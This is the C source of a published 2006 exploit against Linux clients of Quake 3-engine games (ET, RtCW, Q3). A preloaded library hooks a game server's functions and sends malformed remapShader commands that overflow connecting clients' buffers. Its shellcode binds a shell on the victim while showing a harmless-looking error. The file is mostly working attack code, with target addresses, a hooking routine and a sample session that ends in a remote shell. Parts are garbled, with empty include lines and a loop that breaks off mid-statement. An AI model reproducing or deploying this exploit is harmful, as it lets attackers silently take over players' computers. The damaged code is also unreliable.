// remap_this.c - "R_RemapShader()" q3 engine 1.32b client remote bof exploit // by landser - landser at hotmail.co.il // // this code works as a preloaded shared library on a game server, // it hooks two functions on the running server: // svc_directconnect() that is called when a client connects, // and sv_sendservercommand() which we use to send malformed "remapShader" commands to clients. // vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message. // // vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro) // (win32 clients are vuln too but not included here) // // usage: // gcc remap_this.c -shared -fPIC -o remap_this.so // and run a server with env LD_PRELOAD="./remap_this.so" // // ----------------------------------------------------- // [luser@box ~/wolfenstein]$ LD_PRELOAD="./remap_this.so" ./wolfded.x86 +set net_port 5678 +map mp_beach // remap_this.c by landser - landser at hotmail.co.il // // game: RtCW 1.41 Dedicated. // [...] // directconnect(): 10.0.0.4 connected // sendservercommand() called // sendservercommand() called // sendservercommand() called // [...] // [luser@box ~/wolfenstein]$ nc 10.0.0.4 27670 -vv // sus4 [10.0.0.4] 27670 (?) open // id // uid=1000(luser) gid=100(lusers) // ----------------------------------------------------- // // visit www.nixcoders.org for open source linux cheats #define _GNU_SOURCE #include #include #include #include #include #include #define SILENT // hide the crappy server output #define PORT 27670 // bindshell port. some values are invalid struct netaddr { // from q3-1.32b/qcommon/qcommon.h int type; unsigned char ip[4]; unsigned char ipx[10]; unsigned short port; }; struct { char *name; char *fn; unsigned long retaddr; // something that jumps to %esp unsigned long sendservercommand; // address of sv_sendservercommand() unsigned long directconnect; // address of svc_directconnect() int hooklen; // for both sendservercommand and directconnect unsigned long errormsg; // address of error string unsigned long comerror; // address of com_error() int popas; // num of popa instructions before shellcode int gap; // gap between %esp to %eip when prog gets to the last shellcode instruction } games[] = { {"ET 2.60 Dedicated", "etded", 0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12}, {"RtCW 1.41 Dedicated", "wolfded", 0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12}, {"Quake 3 1.32b Dedicated", "q3ded", 0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27}, }; const int ngames = sizeof(games) / sizeof(games[0]); const unsigned short int port = PORT; static void *hook (void *, int, void *); static void sendservercommand (void *, const char *, ...); static void directconnect (struct netaddr); static void writebuf (void); void (*_sendservercommand)(void *, const char *, ...); void (*_directconnect)(struct netaddr); int c = -1; unsigned char buf[1024]; // shellcode (286 bytes): // fork()s, // the parent proc calls com_error() with an error message (errormsg var), // the child proc binds a shell on a chosen port // unallowed chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80 unsigned char sc[] = "\x68\x03\x5a\x70\x50\x58\x05\x01\x01\x7b\x71\x50\x68\x57\x50\x7f\x69" "\x58\x05\x01\x7d\x01\x01\x50\x68\x70\x30\x6a\x06\x58\x66\x05\x7b\x76" "\x50\x68\x54\x5b\x52\x53\x68\x2f\x62\x69\x6e\x68\x2f\x73\x68\x68\x68" "\x0b\x58\x68\x2f\x68\x48\x78\x79\x69\x58\x05\x01\x01\x7f\x01\x50\x68" "\x3e\x57\x50\x01\x58\x05\x01\x01\x7d\x7f\x50\x68\x75\x1c\x59\x6a\x68" "\x50\x01\x48\x40\x58\x66\x05\x7d\x7f\x50\x68\x5b\x6a\x02\x58\x68\x7f" "\x50\x53\x58\x58\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01" "\x7d\x50\x68\x57\x54\x59\x43\x68\x7f\x5f\x50\x50\x58\x66\x40\x50\x68" "\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x7f\x6a\x04\x5b\x58" "\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x51" "\x50\x54\x59\x68\x45\x55\x6a\x10\x68\x5b\x0e\x50\x44\x58\x05\x02\x01" "\x7d\x01\x50" "PORT" "\x66\x68\x5b\x5d\x52\x66\x68\x53\x58\x50\x01" "\x58\x05\x01\x01\x7d\x7f\x50\x68\x52\x53\x6a\x02\x68\x4a\x6a\x01\x5b" "\x68\x58\x6a\x01\x5a\x68\x07\x50\x6a\x66\x58\x66\x05\x01\x73\x50\x68" "\x67" "CM1" "\x58\x05\x01" "CM2" "\x50\x68\x6a\x02\x6a\x01\x68" "ERRM" "\x68\x40\x74\x0f\x68\x68\x57\x50\x7f\x47\x58\x05\x01\x7d\x01\x01\x50" "\x68\x41\x41\x6a\x02\x74\x0c\x75\x0a"; void __attribute__ ((constructor)) init (void) { char buf[256]; int ret; printf("remap_this.c by landser - landser at hotmail.co.il\n\n"); ret = readlink("/proc/self/exe", buf, sizeof buf); if (ret < 0) { perror("readlink()"); exit(EXIT_FAILURE); } buf[ret] = '\0'; for (c=0;c> (8*i)) & 0xff; if ((b-1) >= 0x7f) { cm1[i] = 0x6b; cm2[i] = b - 0x6b; } else { cm1[i] = b - 1; cm2[i] = 1; } } ptr = strstr(ptr, "PORT"); if (!ptr) abort(); memcpy(ptr, "\x68\x68", 2); // 68 - pushl imm32 memcpy(ptr+2, &port, sizeof port); ptr = strstr(ptr, "ERRM"); if (!ptr) abort(); memcpy(ptr, &games[c].errormsg, 4); strcat(ptr, "\""); if (!strstr(games[c].name, "Quake")) strcat(ptr, " j w"); } #define PAGE(x) (void *)((unsigned long)x & 0xfffff000) static void *hook (void *hfunc, int len, void *wfunc) { void *newmem = malloc(len+5); long rel32; // copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction after it memcpy(newmem, hfunc, len); memset(newmem+len, 0xe9, 1); // e9 - jmp rel32 rel32 = hfunc - (newmem+5); memcpy(newmem+len+1, &rel32, sizeof rel32); // make 'hfunc's address writable & executable mprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC); // change the start of 'hfunc' to a 'jmp *wfunc' instruction memset(hfunc, 0xe9, 1); // e9 - jmp rel32 rel32 = wfunc - (hfunc+5); memcpy(hfunc+1, &rel32, sizeof rel32); return newmem; } // milw0rm.com [2006-05-05]